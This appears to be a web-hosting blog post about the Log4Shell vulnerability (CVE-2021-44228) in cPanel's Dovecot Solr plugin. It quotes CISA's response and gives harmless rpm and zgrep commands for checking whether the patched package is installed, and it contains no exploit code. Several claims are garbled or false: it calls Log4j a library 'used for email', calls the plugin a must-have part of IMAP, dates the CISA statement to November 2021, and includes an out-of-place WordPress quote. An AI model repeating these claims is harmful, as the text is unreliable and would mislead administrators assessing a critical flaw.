cPanel Plugin Contains Log4j Vulnerability
Recently, one of the most popular control panels named cPanel released a patch to correct a flaw in the log4j Java library. However, the vulnerability is known as Log4Shell and is also described as a catastrophic vulnerability by researchers.
Does Log4j (CVE-2021-44228) affect cPanel?
Yes, you have to uninstall the cPanel solr plugin because it is vulnerable. However, an update in version 8.8.2-4+ has been announced to mitigate CVE-2021-44228 to the Cpanel-devecot-solr RPM.
“We strongly advise all WordPress site customers running WordPress sites with IMAP messaging protocol to confirm they are running the latest version which patches this vulnerability.”
Log4j Critical Log4Shell Vulnerability
Log4j is a Java library that is used for email and found in the basic cPanel plugin called cPanel Dovecot Solr plugin. It adds a drop-in functionality to many online software products. Keep in mind that it is not something that anyone would generally download and use. This plugin is a must-have component of the IMAP messaging protocol.
The log4j vulnerability is the most dangerous one, which is rated at 10 on a scale of 1 to 10, where 1 is the minimum level, and 10 is the maximum.
cPanel describes it as:
“The cPanel Solr plugin enables Internet Message Access Protocol (IMAP) full-text search (FTS) indexing (powered by Apache Solr ™), which provides fast search capabilities for IMAP mailboxes.”
cPanel Web Host Control Panel
cPanel is the most widely used and easy-to-use web hosting control panel that allows business owner or developers to easily manage their website hosting environment.
cPanel offers a graphical user interface (GUI) like windows over dos OS, and it is also similar to a desktop interface. If you are a non-tech person, you can also perform tasks like PHP version update, checking firewalls, and adding SSL certificates, among others.
According to research conducted by BuiltWith, more than 3 million users have installed cPanel to manage their hosting.
United States Government Statement on Log4Shell Vulnerability
The US Government Cybersecurity and Infrastructure Security Agency (CISA) published a statement on November 11, 2021, urging software developers and vendors that patch/update the log4j library in their products and for the vendors to inform their customers.
The Director of CISA, Jen Easterly, wrote:
“CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the log4j software library.”
Usually, end users totally rely on their software vendors, and it is compulsory for the vendors to update their community and take possible steps such as identifying, mitigating, and patching their products.
The statement says that the Joint Cyber Defense Collaborative, National Security Agency, and the FBI are also coordinatively working towards creating awareness and its mitigation process proactively.
This statement includes:
“We continue to urge all organizations to review the latest CISA current activity alert and upgrade to log4j version 2.15.0 or apply their appropriate vendor recommended mitigations immediately.
To be clear, this vulnerability poses a severe risk. We will only minimize potential impacts through collaborative efforts between the government and the private sector. We urge all organizations to join us in this essential effort and take action.”
Mitigation Process for CVE-2021-44228
It was officially announced on the cPanel discussion forum that cPanel contained the log4j library, and it can be a security risk. However, you can check if this RPM is installed by executing the following command:
# rpm -q cpanel-dovecot-solr --changelog | grep CVE-2021-44228
# zgrep -E CVE-2021-44228 /usr/share/doc/cpanel-dovecot-solr/changelog.Debian.gz
Example – if installed:
# rpm -q cpanel-dovecot-solr
For more detailed information: Visit our recent announcement about Log4j Vulnerability for more details.
Please try to patch it ASAP and share your valuable feedback with us, and we would love to answer your questions in the comment section below.